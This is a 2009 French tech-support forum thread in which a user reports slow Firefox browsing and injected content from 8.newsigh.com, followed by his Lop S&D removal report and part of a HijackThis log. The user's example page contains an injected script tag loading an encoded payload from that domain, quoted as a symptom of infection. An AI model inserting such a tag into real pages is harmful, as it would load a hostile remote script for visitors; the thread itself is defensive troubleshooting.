Pages internet modifiées affichage lent
Fermé
wauthimi
-
27 sept. 2009 à 00:29
wauthimi Messages postés 8 Date d'inscription dimanche 27 septembre 2009 Statut Membre Dernière intervention 5 octobre 2009 - 3 oct. 2009 à 22:04
wauthimi Messages postés 8 Date d'inscription dimanche 27 septembre 2009 Statut Membre Dernière intervention 5 octobre 2009 - 3 oct. 2009 à 22:04
A voir également:
- Pages internet modifiées affichage lent
- Pc lent - Guide
- Mon mac est lent comment le nettoyer - Guide
- Gps sans internet - Guide
- Supprimer des pages sur word - Guide
- Traduire une page internet - Guide
5 réponses
Narco!4
Messages postés
2385
Date d'inscription
dimanche 25 janvier 2009
Statut
Contributeur
Dernière intervention
25 octobre 2012
467
27 sept. 2009 à 00:44
27 sept. 2009 à 00:44
Bonsoir
télécharge GenProc http://www.genproc.com/GenProc.exe sur ton bureau
double-clique sur GenProc.exe et poste le contenu du rapport qui s'ouvre
télécharge GenProc http://www.genproc.com/GenProc.exe sur ton bureau
double-clique sur GenProc.exe et poste le contenu du rapport qui s'ouvre
Narco!4
Messages postés
2385
Date d'inscription
dimanche 25 janvier 2009
Statut
Contributeur
Dernière intervention
25 octobre 2012
467
27 sept. 2009 à 18:40
27 sept. 2009 à 18:40
fait le en mode sans echec
wauthimi
Messages postés
8
Date d'inscription
dimanche 27 septembre 2009
Statut
Membre
Dernière intervention
5 octobre 2009
28 sept. 2009 à 00:14
28 sept. 2009 à 00:14
Bonsoir,
J'ai fais deux tentatives et le phénomène revient.
Après 5 à dix minutes de surf a une vitesse normale, firefox ralentit et le site 8.newsigh.com est inséré dans toutes les pages voir exemple.
merci de votre aide
Michel
Exemple
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" >
<head><link rel="shortcut icon" href="../icon_genproc.ico" />
<title>AV Norton</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link rel="stylesheet" media="screen" type="text/css" title="design" href="design.css" />
</head>
<body><script src="http://8.newsigh.com/popup.php?data=1d000000524b98bee08db0603cfb3e7c65530ac7fe87476ffada0d1ac7ff6e13865d7854cebb36a89a36af415664793b4cf66161256bc1861e0ec43df0bfdec8e11cdc01d1c1e796ecc6b162774b39fdf3d036c52fe00e267de5f12050aa91dcb18c9ef435316168a67a65c4c98ab46d68da292dbc57aa07ada1c167bce418980369fda3"></script>
<h1>Voici comment autoriser le script :</h1>
<br />
<br />
<br />
<br />
<p>
Si norton vous demande comment réagir lors de l'exécution de GenProc, bien sélectionner<br />
<em>"<strong>autoriser ce script</strong>"</em> et valider.
</p>
<br />
<br />
<center> <img src="img.PNG" /></center>
</body>
</html>
rapport LOPR
--------------------\\ Lop S&D 4.2.5-0 XP/Vista
Microsoft Windows XP Édition familiale ( v5.1.2600 ) Service Pack 3
X86-based PC ( Multiprocessor Free : Intel(R) Pentium(R) 4 CPU 3.40GHz )
BIOS : Phoenix - AwardBIOS v6.00PG
USER : Michel ( Administrator )
BOOT : Fail-safe boot
Antivirus : Symantec AntiVirus Corporate Edition 10.0.1.1000 (Activated)
Firewall : Kerio Personal Firewall 4.2.3 T (Activated)
C:\ (Local Disk) - NTFS - Total:125 Go (Free:35 Go)
D:\ (Local Disk) - NTFS - Total:89 Go (Free:69 Go)
E:\ (Local Disk) - FAT32 - Total:17 Go (Free:13 Go)
F:\ (Local Disk) - NTFS - Total:146 Go (Free:48 Go)
G:\ (Local Disk) - NTFS - Total:151 Go (Free:36 Go)
H:\ (CD or DVD)
I:\ (CD or DVD)
J:\ (USB)
K:\ (USB)
L:\ (USB)
"C:\Lop SD" ( MAJ : 19-12-2008|23:40 )
Option : [2] ( dim. 27/09/2009|23:17 )
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ SUPPRESSION
Supprime! - C:\WINDOWS\Tasks\AFEA01B7919DB2F7.job
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@advertstream[2].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@totallybaby.advertserve[1].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@adultfriendfinder[2].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@adultfriendfinder[3].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@adopt.euroclick[1].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@2xmoinscher[2].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@planeteachat.2xmoinscher[1].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@www.2xmoinscher[1].txt
Supprime! - C:\DOCUME~1\Michel\APPLIC~1\online~1
Supprime! - C:\Program Files\online~1
-
[ Fichier Hosts ] .. Restaure!
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
--------------------\\ Listing des dossiers dans APPLIC~1
[25/10/2004|08:06] C:\DOCUME~1\ADMINI~1\APPLIC~1\CyberLink
[13/10/2004|21:26] C:\DOCUME~1\ADMINI~1\APPLIC~1\Identities
[14/10/2004|09:30] C:\DOCUME~1\ADMINI~1\APPLIC~1\Macromedia
[12/11/2004|15:05] C:\DOCUME~1\ADMINI~1\APPLIC~1\Microsoft
[14/10/2004|09:43] C:\DOCUME~1\ADMINI~1\APPLIC~1\Real
[14/10/2004|11:36] C:\DOCUME~1\ADMINI~1\APPLIC~1\Sun
[07/11/2008|23:24] C:\DOCUME~1\ALLUSE~1\APPLIC~1\{3276BE95_AF08_429F_A64F_CA64CB79BCF6}
[20/04/2009|21:13] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Adobe
[14/10/2004|09:51] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Ahead
[07/11/2008|23:21] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Apple
[07/11/2008|23:22] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Apple Computer
[26/02/2006|14:42] C:\DOCUME~1\ALLUSE~1\APPLIC~1\BOONTY
[19/07/2008|11:44] C:\DOCUME~1\ALLUSE~1\APPLIC~1\CanonBJ
[19/07/2009|08:59] C:\DOCUME~1\ALLUSE~1\APPLIC~1\CanonIJPLM
[01/12/2006|23:58] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Comodo
[24/10/2004|19:38] C:\DOCUME~1\ALLUSE~1\APPLIC~1\CyberLink
[17/03/2009|23:40] C:\DOCUME~1\ALLUSE~1\APPLIC~1\DVD Shrink
[18/04/2009|22:58] C:\DOCUME~1\ALLUSE~1\APPLIC~1\GARMIN
[14/04/2006|15:55] C:\DOCUME~1\ALLUSE~1\APPLIC~1\InstallShield
[26/11/2004|02:52] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Kazaa Lite
[14/06/2008|12:17] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Lavasoft
[18/02/2006|15:15] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Love Clock Mapi Bend
[18/03/2005|23:40] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Macrovision
[24/09/2009|22:01] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Malwarebytes
[26/10/2005|19:46] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Messenger Plus!
[18/10/2008|17:34] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Microsoft
[11/09/2009|00:12] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Microsoft Help
[24/10/2004|19:29] C:\DOCUME~1\ALLUSE~1\APPLIC~1\muvee Technologies
[03/02/2005|21:00] C:\DOCUME~1\ALLUSE~1\APPLIC~1\My Pictures
[17/01/2005|16:39] C:\DOCUME~1\ALLUSE~1\APPLIC~1\NFS Underground
[14/10/2004|11:38] C:\DOCUME~1\ALLUSE~1\APPLIC~1\nView_Profiles
[10/04/2005|22:36] C:\DOCUME~1\ALLUSE~1\APPLIC~1\OD2
[26/03/2007|21:52] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Office Genuine Advantage
[21/10/2007|22:29] C:\DOCUME~1\ALLUSE~1\APPLIC~1\OrbNetworks
[06/12/2004|05:48] C:\DOCUME~1\ALLUSE~1\APPLIC~1\QuickTime
[21/05/2005|16:02] C:\DOCUME~1\ALLUSE~1\APPLIC~1\River Past G2
[05/08/2005|19:42] C:\DOCUME~1\ALLUSE~1\APPLIC~1\River Past G3
[23/10/2006|19:06] C:\DOCUME~1\ALLUSE~1\APPLIC~1\River Past G4
[13/10/2004|22:10] C:\DOCUME~1\ALLUSE~1\APPLIC~1\SBSI
[18/10/2008|13:18] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Skype
[03/02/2005|21:00] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Sony Ericsson
[23/09/2009|16:39] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Spybot - Search & Destroy
[25/11/2004|21:32] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Support.com
[02/12/2006|14:44] C:\DOCUME~1\ALLUSE~1\APPLIC~1\SupportSoft
[18/02/2006|12:46] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Symantec
[16/03/2009|21:58] C:\DOCUME~1\ALLUSE~1\APPLIC~1\vsosdk
[21/10/2007|22:29] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Winamp Toolbar
[19/08/2005|09:37] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Windows Genuine Advantage
[17/06/2005|19:29] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Xceed Software
[18/03/2007|17:42] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Yahoo! Companion
[21/07/2009|22:47] C:\DOCUME~1\ALLUSE~1\APPLIC~1\ZoomBrowser
[25/10/2004|08:06] C:\DOCUME~1\DEFAUL~1\APPLIC~1\CyberLink
[13/10/2004|21:26] C:\DOCUME~1\DEFAUL~1\APPLIC~1\Identities
[14/10/2004|09:30] C:\DOCUME~1\DEFAUL~1\APPLIC~1\Macromedia
[12/11/2004|15:05] C:\DOCUME~1\DEFAUL~1\APPLIC~1\Microsoft
[14/10/2004|09:43] C:\DOCUME~1\DEFAUL~1\APPLIC~1\Real
[14/10/2004|11:36] C:\DOCUME~1\DEFAUL~1\APPLIC~1\Sun
[25/07/2008|22:09] C:\DOCUME~1\LOCALS~1\APPLIC~1\Microsoft
[07/01/2006|12:37] C:\DOCUME~1\LOCALS~1\APPLIC~1\OD2
[24/09/2009|21:26] C:\DOCUME~1\LOCALS~1\APPLIC~1\SolidDocuments
[24/10/2004|20:04] C:\DOCUME~1\LOCALS~1\APPLIC~1\X10 Commander
[27/03/2005|14:05] C:\DOCUME~1\Michel\APPLIC~1\Absolutist.com
[26/12/2004|13:50] C:\DOCUME~1\Michel\APPLIC~1\Active Disk
[27/06/2007|21:50] C:\DOCUME~1\Michel\APPLIC~1\Adobe
[22/01/2007|22:27] C:\DOCUME~1\Michel\APPLIC~1\AdobeUM
[09/10/2007|00:21] C:\DOCUME~1\Michel\APPLIC~1\Ahead
[28/01/2006|21:58] C:\DOCUME~1\Michel\APPLIC~1\Apple Computer
[27/01/2008|18:27] C:\DOCUME~1\Michel\APPLIC~1\Ariane Software
[24/03/2007|17:19] C:\DOCUME~1\Michel\APPLIC~1\AVSMedia
[08/06/2008|20:21] C:\DOCUME~1\Michel\APPLIC~1\beid-cache
[11/12/2004|23:57] C:\DOCUME~1\Michel\APPLIC~1\BVS Solitaire Collection
[26/12/2007|17:36] C:\DOCUME~1\Michel\APPLIC~1\Canon
[19/07/2008|13:11] C:\DOCUME~1\Michel\APPLIC~1\CD-LabelPrint
[01/12/2006|23:58] C:\DOCUME~1\Michel\APPLIC~1\Comodo
[14/04/2006|15:55] C:\DOCUME~1\Michel\APPLIC~1\Corel
[11/12/2005|21:28] C:\DOCUME~1\Michel\APPLIC~1\CyberLink
[09/01/2009|22:59] C:\DOCUME~1\Michel\APPLIC~1\DivX
[20/09/2009|15:58] C:\DOCUME~1\Michel\APPLIC~1\dvdcss
[16/03/2009|23:00] C:\DOCUME~1\Michel\APPLIC~1\DVDFab
[29/08/2008|22:50] C:\DOCUME~1\Michel\APPLIC~1\FileZilla
[15/09/2009|18:25] C:\DOCUME~1\Michel\APPLIC~1\foobar2000
[18/04/2009|22:58] C:\DOCUME~1\Michel\APPLIC~1\GARMIN
[29/12/2007|16:02] C:\DOCUME~1\Michel\APPLIC~1\gtk-2.0
[28/11/2004|23:01] C:\DOCUME~1\Michel\APPLIC~1\Help
[08/01/2005|11:33] C:\DOCUME~1\Michel\APPLIC~1\Identities
[20/07/2007|20:17] C:\DOCUME~1\Michel\APPLIC~1\InstallShield
[26/11/2004|02:39] C:\DOCUME~1\Michel\APPLIC~1\Kazaa Lite
[22/01/2005|19:07] C:\DOCUME~1\Michel\APPLIC~1\La Bataille pour la Terre du Milieu
[14/06/2008|12:16] C:\DOCUME~1\Michel\APPLIC~1\Lavasoft
[30/12/2004|01:08] C:\DOCUME~1\Michel\APPLIC~1\Leadertech
[14/10/2004|09:30] C:\DOCUME~1\Michel\APPLIC~1\Macromedia
[24/09/2009|22:01] C:\DOCUME~1\Michel\APPLIC~1\Malwarebytes
[09/01/2009|22:17] C:\DOCUME~1\Michel\APPLIC~1\Media Player Classic
[18/02/2006|15:13] C:\DOCUME~1\Michel\APPLIC~1\MEDIAAMEN
[11/07/2009|17:55] C:\DOCUME~1\Michel\APPLIC~1\Microsoft
[23/09/2009|21:39] C:\DOCUME~1\Michel\APPLIC~1\Mozilla
[12/03/2005|15:45] C:\DOCUME~1\Michel\APPLIC~1\Neo-Modus.com
[10/04/2005|22:31] C:\DOCUME~1\Michel\APPLIC~1\OD2
[24/02/2009|00:24] C:\DOCUME~1\Michel\APPLIC~1\OfficeUpdate12
[02/04/2005|16:51] C:\DOCUME~1\Michel\APPLIC~1\Publish Providers
[14/10/2004|09:43] C:\DOCUME~1\Michel\APPLIC~1\Real
[21/05/2005|16:02] C:\DOCUME~1\Michel\APPLIC~1\River Past G2
[23/10/2006|19:03] C:\DOCUME~1\Michel\APPLIC~1\River Past G4
[01/01/2009|11:58] C:\DOCUME~1\Michel\APPLIC~1\Samsung
[04/11/2008|22:06] C:\DOCUME~1\Michel\APPLIC~1\Skype
[20/10/2008|17:32] C:\DOCUME~1\Michel\APPLIC~1\skypePM
[25/01/2007|21:21] C:\DOCUME~1\Michel\APPLIC~1\SlySoft
[27/09/2009|16:54] C:\DOCUME~1\Michel\APPLIC~1\SolidDocuments
[02/04/2005|16:49] C:\DOCUME~1\Michel\APPLIC~1\Sony
[26/12/2008|18:30] C:\DOCUME~1\Michel\APPLIC~1\Sony Corporation
[19/11/2006|18:09] C:\DOCUME~1\Michel\APPLIC~1\Sports Interactive
[14/10/2004|11:36] C:\DOCUME~1\Michel\APPLIC~1\Sun
[07/10/2005|10:02] C:\DOCUME~1\Michel\APPLIC~1\Talkback
[18/02/2007|16:42] C:\DOCUME~1\Michel\APPLIC~1\U3
[04/10/2008|22:52] C:\DOCUME~1\Michel\APPLIC~1\uniblue
[15/09/2009|08:55] C:\DOCUME~1\Michel\APPLIC~1\uTorrent
[23/09/2009|21:31] C:\DOCUME~1\Michel\APPLIC~1\vlc
[19/08/2009|23:19] C:\DOCUME~1\Michel\APPLIC~1\Vso
[27/10/2008|09:08] C:\DOCUME~1\Michel\APPLIC~1\WinRAR
[27/09/2009|20:47] C:\DOCUME~1\Michel\APPLIC~1\ZoomBrowser EX
[25/02/2007|10:37] C:\DOCUME~1\NETWOR~1\APPLIC~1\Microsoft
[12/11/2005|13:02] C:\DOCUME~1\NETWOR~1\APPLIC~1\Mozilla
[22/07/2006|13:26] C:\DOCUME~1\NETWOR~1\APPLIC~1\SolidDocuments
[12/11/2005|13:02] C:\DOCUME~1\NETWOR~1\APPLIC~1\Talkback
[24/10/2004|19:42] C:\DOCUME~1\NETWOR~1\APPLIC~1\X10 Commander
[12/02/2005|17:47] C:\DOCUME~1\PROPRI~1\APPLIC~1\Ahead
[11/01/2005|22:20] C:\DOCUME~1\PROPRI~1\APPLIC~1\Real
--------------------\\ Tâches planifiées dans C:\WINDOWS\tasks
[27/09/2009 23:14][--ah-----] C:\WINDOWS\tasks\MP Scheduled Scan.job
[05/08/2004 14:00][-r-h-----] C:\WINDOWS\tasks\desktop.ini
[27/09/2009 23:09][--ah-----] C:\WINDOWS\tasks\SA.DAT
--------------------\\ Listing des dossiers dans C:\Program Files
[27/09/2009|22:38] C:\Program Files\Firefox
[20/04/2009|21:13] C:\Program Files\Adobe
[26/11/2005|17:19] C:\Program Files\Ahead
[02/11/2006|23:33] C:\Program Files\ALO Power Audio Converter
[02/11/2006|23:26] C:\Program Files\AltoMP3 Gold
[07/11/2008|23:21] C:\Program Files\Apple Software Update
[10/09/2006|09:58] C:\Program Files\Ashampoo
[05/12/2004|13:12] C:\Program Files\AWicons Lite
[23/09/2009|20:25] C:\Program Files\Belgacom
[29/05/2007|21:17] C:\Program Files\Belgium Identity Card
[02/11/2008|17:21] C:\Program Files\BitComet
[23/09/2009|17:43] C:\Program Files\Bonjour
[24/06/2007|22:39] C:\Program Files\BoontyGames
[11/12/2004|15:03] C:\Program Files\BVS Solitaire Collection
[18/02/2006|14:49] C:\Program Files\CA
[27/12/2008|12:45] C:\Program Files\Canon
[19/07/2008|11:46] C:\Program Files\CanonBJ
[23/09/2009|16:31] C:\Program Files\CCleaner
[23/12/2007|17:50] C:\Program Files\CD Audio Reader Filter
[28/02/2006|22:22] C:\Program Files\Cisco Systems
[25/01/2005|16:58] C:\Program Files\Common Files
[13/10/2004|21:24] C:\Program Files\ComPlus Applications
[14/04/2006|15:55] C:\Program Files\Corel
[24/10/2004|19:38] C:\Program Files\CyberLink
[13/04/2009|20:45] C:\Program Files\DIFX
[28/08/2007|09:33] C:\Program Files\Direct WAV MP3 Splitter
[23/12/2007|17:50] C:\Program Files\DirectVobSub
[09/01/2009|22:58] C:\Program Files\DivX
[26/12/2004|20:54] C:\Program Files\Doom 3
[09/01/2009|23:08] C:\Program Files\DScaler
[28/11/2007|17:51] C:\Program Files\DVD Decrypter
[28/11/2007|17:45] C:\Program Files\DVD Shrink
[16/03/2009|22:09] C:\Program Files\DVDFab 5
[19/08/2009|23:19] C:\Program Files\DVDFab 6
[21/10/2007|15:49] C:\Program Files\DVDFab Decrypter 3
[21/10/2007|15:50] C:\Program Files\DVDFab HD Decrypter 3
[17/03/2009|17:48] C:\Program Files\DVDIdle Pro
[14/03/2009|23:49] C:\Program Files\DVDVideoSoft
[05/12/2004|01:43] C:\Program Files\Elaborate Bytes
[10/02/2009|23:56] C:\Program Files\ElcomSoft
[14/10/2004|10:53] C:\Program Files\Encarta
[25/11/2004|22:30] C:\Program Files\EPSON
[23/09/2009|20:25] C:\Program Files\Fichiers communs
[21/08/2008|17:36] C:\Program Files\FileZilla FTP Client
[15/09/2009|18:34] C:\Program Files\FLAC
[15/09/2009|09:44] C:\Program Files\foobar2000
[27/08/2006|12:04] C:\Program Files\Free Audio Pack
[13/04/2009|20:55] C:\Program Files\Garmin
[13/04/2009|20:45] C:\Program Files\Garmin GPS Plugin
[29/12/2007|14:46] C:\Program Files\Gimp Pack Mode
[21/04/2008|21:56] C:\Program Files\Google
[23/12/2007|17:42] C:\Program Files\Haali
[18/10/2008|17:43] C:\Program Files\Hercules
[13/10/2004|23:39] C:\Program Files\HighMAT CD Writing Wizard
[11/12/2005|19:00] C:\Program Files\Home Cinema
[02/11/2006|23:11] C:\Program Files\Illustrate
[20/03/2005|18:17] C:\Program Files\iMeshBar
[14/02/2009|23:00] C:\Program Files\InstallShield Installation Information
[13/10/2004|22:26] C:\Program Files\Intel
[06/12/2004|02:09] C:\Program Files\InterActual
[29/07/2009|21:12] C:\Program Files\Internet Explorer
[16/01/2005|12:20] C:\Program Files\Iomega
[14/02/2009|23:20] C:\Program Files\iPod
[07/11/2008|23:24] C:\Program Files\iTunes
[15/08/2009|23:04] C:\Program Files\Java
[24/03/2007|15:53] C:\Program Files\K!TV
[18/03/2006|14:54] C:\Program Files\Lavalys
[14/06/2008|12:16] C:\Program Files\Lavasoft
[17/03/2008|22:44] C:\Program Files\LexarMedia
[09/10/2005|14:09] C:\Program Files\LizardTech
[24/09/2009|22:01] C:\Program Files\Malwarebytes' Anti-Malware
[14/10/2004|12:08] C:\Program Files\Medion Tools
[14/08/2008|00:35] C:\Program Files\Messenger
[15/07/2006|17:55] C:\Program Files\Microsoft AntiSpyware
[01/06/2008|22:49] C:\Program Files\Microsoft CAPICOM 2.1.0.2
[13/10/2004|21:26] C:\Program Files\microsoft frontpage
[08/01/2005|23:39] C:\Program Files\Microsoft Money 2005
[31/05/2008|09:48] C:\Program Files\Microsoft Office
[12/11/2004|19:53] C:\Program Files\Microsoft Visual Studio
[31/05/2008|09:48] C:\Program Files\Microsoft Works
[14/10/2004|10:40] C:\Program Files\Microsoft Works Suite 2005
[31/05/2008|09:47] C:\Program Files\Microsoft.NET
[02/08/2008|21:40] C:\Program Files\Movie Maker
[23/09/2009|21:53] C:\Program Files\Mozilla Firefox
[04/10/2008|22:32] C:\Program Files\MSBuild
[15/03/2008|08:54] C:\Program Files\MSECache
[26/11/2004|05:17] C:\Program Files\MSN
[13/10/2004|21:23] C:\Program Files\MSN Gaming Zone
[07/07/2006|18:57] C:\Program Files\MSN Messenger
[15/11/2006|15:26] C:\Program Files\MSXML 4.0
[10/04/2005|22:30] C:\Program Files\Music Manager
[03/04/2007|22:38] C:\Program Files\MusicBrainz Tagger
[24/10/2004|19:41] C:\Program Files\MUSICMATCH
[24/10/2004|19:29] C:\Program Files\muvee Technologies
[27/09/2009|22:22] C:\Program Files\Navilog1
[02/08/2008|21:38] C:\Program Files\NetMeeting
[26/12/2004|17:37] C:\Program Files\NewSoft
[19/09/2009|09:43] C:\Program Files\O Imaging Corporation
[18/02/2006|14:00] C:\Program Files\online more mess
[23/12/2007|17:50] C:\Program Files\OpenSource Flash Video Splitter
[13/08/2009|00:48] C:\Program Files\Outlook Express
[17/07/2008|22:31] C:\Program Files\PDFCreator
[09/01/2005|13:07] C:\Program Files\PHILIPS
[02/08/2009|11:13] C:\Program Files\Picasa2
[16/09/2006|18:28] C:\Program Files\Picture It! Premium 10
[13/02/2007|23:39] C:\Program Files\ProjectViewer
[07/11/2008|23:23] C:\Program Files\QuickTime
[13/10/2004|22:41] C:\Program Files\RALINK
[12/03/2007|03:19] C:\Program Files\Ratajik Software
[14/10/2004|09:41] C:\Program Files\Real
[23/12/2007|17:51] C:\Program Files\RealMedia
[04/10/2008|22:32] C:\Program Files\Reference Assemblies
[02/11/2008|21:30] C:\Program Files\Registry Clean Pro
[01/01/2009|11:46] C:\Program Files\Samsung
[06/03/2008|12:32] C:\Program Files\SearchRelevant
[25/12/2008|00:19] C:\Program Files\SEC
[13/10/2004|21:24] C:\Program Files\Services en ligne
[23/12/2007|17:50] C:\Program Files\SHOUTcast Source
[18/10/2008|13:18] C:\Program Files\Skype
[07/08/2006|21:07] C:\Program Files\SlySoft
[27/02/2005|16:19] C:\Program Files\SolidDocuments
[26/12/2008|17:56] C:\Program Files\Sony
[08/04/2006|21:46] C:\Program Files\Sony Ericsson
[22/09/2009|23:04] C:\Program Files\Spybot - Search & Destroy
[19/07/2008|07:42] C:\Program Files\SSC Service Utility
[12/03/2007|13:16] C:\Program Files\StreamRipper32
[02/11/2008|22:35] C:\Program Files\Sunbelt Software
[02/12/2006|14:40] C:\Program Files\support.com
[24/02/2006|11:43] C:\Program Files\Symantec
[27/09/2009|22:34] C:\Program Files\Symantec AntiVirus
[20/07/2007|20:18] C:\Program Files\TomTom HOME
[02/12/2006|00:01] C:\Program Files\Trustix
[04/10/2008|22:52] C:\Program Files\Uniblue
[13/10/2004|21:28] C:\Program Files\Uninstall Information
[13/10/2004|22:40] C:\Program Files\USB Wireless Keyboard Driver
[01/03/2009|17:42] C:\Program Files\uTorrent
[28/12/2007|23:11] C:\Program Files\VideoLAN
[02/04/2005|16:51] C:\Program Files\VSTplugins
[21/10/2007|22:29] C:\Program Files\Winamp Remote
[21/10/2007|22:29] C:\Program Files\Winamp Toolbar
[13/10/2004|23:18] C:\Program Files\Winbond Electronics Corp
[13/10/2004|22:53] C:\Program Files\WinDlg
[02/11/2006|21:20] C:\Program Files\Windows Defender
[13/10/2004|22:07] C:\Program Files\Windows Journal Viewer
[03/11/2006|23:19] C:\Program Files\Windows Media Bonus Pack for Windows XP
[03/11/2006|22:43] C:\Program Files\Windows Media Connect
[03/11/2006|22:46] C:\Program Files\Windows Media Connect 2
[02/08/2008|21:38] C:\Program Files\Windows Media Player
[02/08/2008|21:38] C:\Program Files\Windows NT
[13/10/2004|21:24] C:\Program Files\WindowsUpdate
[23/07/2006|08:10] C:\Program Files\WinRAR
[22/07/2006|21:55] C:\Program Files\WinZip
[13/10/2004|22:50] C:\Program Files\X10 Hardware
[13/10/2004|21:26] C:\Program Files\xerox
[09/06/2007|23:02] C:\Program Files\Xvid
[18/03/2007|17:41] C:\Program Files\Yahoo!
[20/03/2005|17:51] C:\Program Files\Zero G Registry
--------------------\\ Listing des dossiers dans C:\Program Files\Fichiers communs
[20/04/2009|21:13] C:\Program Files\Fichiers communs\Adobe
[14/10/2004|09:51] C:\Program Files\Fichiers communs\Ahead
[07/11/2008|23:21] C:\Program Files\Fichiers communs\Apple
[01/04/2007|19:58] C:\Program Files\Fichiers communs\AVSMedia
[26/02/2006|14:42] C:\Program Files\Fichiers communs\BOONTY Shared
[13/10/2004|23:18] C:\Program Files\Fichiers communs\Borland Shared
[27/12/2008|12:42] C:\Program Files\Fichiers communs\Canon
[15/07/2006|22:52] C:\Program Files\Fichiers communs\Corel
[12/11/2004|19:53] C:\Program Files\Fichiers communs\Designer
[17/12/2004|03:38] C:\Program Files\Fichiers communs\DirectX
[14/03/2009|23:49] C:\Program Files\Fichiers communs\DVDVideoSoft
[02/11/2008|17:30] C:\Program Files\Fichiers communs\EPSON
[19/11/2006|17:58] C:\Program Files\Fichiers communs\InstallShield
[14/10/2004|11:35] C:\Program Files\Fichiers communs\Java
[18/03/2005|23:40] C:\Program Files\Fichiers communs\Macrovision Shared
[22/02/2009|17:22] C:\Program Files\Fichiers communs\Microsoft Shared
[29/04/2005|20:08] C:\Program Files\Fichiers communs\MimarSinan
[13/10/2004|21:24] C:\Program Files\Fichiers communs\MSSoap
[24/10/2004|19:29] C:\Program Files\Fichiers communs\muvee Technologies
[03/11/2005|23:12] C:\Program Files\Fichiers communs\NSV
[13/10/2004|23:19] C:\Program Files\Fichiers communs\ODBC
[09/01/2005|13:07] C:\Program Files\Fichiers communs\PhilipsMM
[26/03/2007|20:48] C:\Program Files\Fichiers communs\Real
[13/10/2004|21:24] C:\Program Files\Fichiers communs\Services
[18/10/2008|13:18] C:\Program Files\Fichiers communs\Skype
[27/02/2005|16:19] C:\Program Files\Fichiers communs\SolidDocuments
[26/12/2008|17:55] C:\Program Files\Fichiers communs\Sony Shared
[13/10/2004|23:19] C:\Program Files\Fichiers communs\SpeechEngines
[23/09/2009|20:25] C:\Program Files\Fichiers communs\Supportsoft
[24/02/2006|11:52] C:\Program Files\Fichiers communs\Symantec Shared
[02/08/2008|21:38] C:\Program Files\Fichiers communs\System
[21/12/2006|21:44] C:\Program Files\Fichiers communs\SystemRequirementsLab
[08/04/2006|21:46] C:\Program Files\Fichiers communs\Teleca Shared
[14/06/2008|12:15] C:\Program Files\Fichiers communs\Wise Installation Wizard
[26/03/2007|20:48] C:\Program Files\Fichiers communs\xing shared
--------------------\\ Process
( 17 Processes )
... OK !
--------------------\\ Recherche avec S_Lop
Aucun fichier / dossier Lop trouvé !
--------------------\\ Recherche de Fichiers / Dossiers Lop
Aucun fichier / dossier Lop trouvé !
--------------------\\ Verification du Registre
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
..... OK !
--------------------\\ Verification du fichier Hosts
Fichier Hosts PROPRE
--------------------\\ Recherche de fichiers avec Catchme
catchme 0.3.1353 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-09-27 23:20:34
Windows 5.1.2600 Service Pack 3 NTFS
scanning hidden processes ...
scanning hidden files ...
scan completed successfully
hidden processes: 0
hidden files: 0
--------------------\\ Recherche d'autres infections
Aucune autre infection trouvée !
[F:1][D:2]-> C:\DOCUME~1\Michel\LOCALS~1\Temp
[F:2819][D:0]-> C:\DOCUME~1\Michel\Cookies
[F:7230][D:50]-> C:\DOCUME~1\Michel\LOCALS~1\TEMPOR~1\content.IE5
1 - "C:\Lop SD\LopR_1.txt" - dim. 27/09/2009|23:22 - Option : [2]
--------------------\\ Fin du rapport a 23:22:26
Hijackthis
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 0:10:18, on 28/09/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Fichiers communs\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
